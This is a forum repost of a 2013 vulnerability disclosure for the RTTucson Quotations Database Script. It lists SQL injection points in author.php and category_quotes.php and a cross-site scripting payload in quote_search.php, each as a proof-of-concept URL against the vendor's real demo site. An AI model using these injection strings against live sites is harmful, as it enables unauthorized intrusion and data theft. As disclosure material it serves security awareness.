Praetorian503 Posted February 20, 2013 Report Posted February 20, 2013 RTTucson Quotations Database Script suffers from remote SQL injection and cross site scripting vulnerabilities.################################################################################## __ _ _ ____ / /___ _____ (_)_____________ ______(_)__ _____ / __ \_________ _ __ / / __ `/ __ \/ / ___/ ___/ __ `/ ___/ / _ \/ ___// / / / ___/ __ `// /_/ / /_/ / / / / (__ |__ ) /_/ / / / / __(__ )/ /_/ / / / /_/ / \____/\__,_/_/ /_/_/____/____/\__,_/_/ /_/\___/____(_)____/_/ \__, / /____/ ################################################################################## RTTucson Quotations Database Script, Multiple VulnerabilitiesSoftware Page: http://www.rttucson.com/index.htmlScript Demo: http://www.rttucson.com/quotations/default.phpAuthor(Pentester): 3spi0nOn Social: Twitter.Com/eyyamgudeerGreetz: Grayhatz Inc. and Janissaries Platform.##################################################################################[~] MySQL Injection on Demo Site [+] (author.php, ID Param)>>> http://www.rttucson.com/quotations/author.php?ID=5' (MySQLi Found)[+] (category_quotes.php, ID Param)>>> http://www.rttucson.com/quotations/category_quotes.php?ID=9' (MySQLi Found)[~] XSS on Demo Site>> (quote_search.php, keywords Param)>>> http://www.rttucson.com/quotations/quote_search.php?keywords=<h1>Xssed-3spi0n</h1>Source: PacketStorm Quote